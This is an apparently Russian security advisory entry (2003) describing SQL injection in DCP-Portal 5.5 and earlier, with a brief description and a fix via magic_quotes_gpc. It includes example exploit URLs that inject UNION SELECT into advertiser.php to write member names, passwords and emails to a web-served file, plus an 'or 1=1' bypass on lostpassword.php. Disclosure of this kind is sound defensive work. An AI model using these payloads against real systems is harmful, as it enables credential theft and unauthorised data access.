Дата публикации: | 03.10.2003 |
Всего просмотров: | 1627 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: DCP-Portal 5.5 и более ранние версии
Описание: Уязвимость обнаружена в DCP-Portal 5.x. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных. DCP-Portal не проверяет данные, представленные пользователем, перед передачей их к динамическому SQL запросу в различных параметрах и сценариях. В результате удаленный пользователь может манипулировать SQL запросом, чтобы обойти идентификацию, манипулировать данными и извлекать произвольные данные. Пример/Эксплоит: http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--' URL производителя: http://www.dcp-portal.com Решение:Включите magic_quotes_gpc в php.ini файле. |
|
Ссылки: | DCP Portal - 5.5 holes |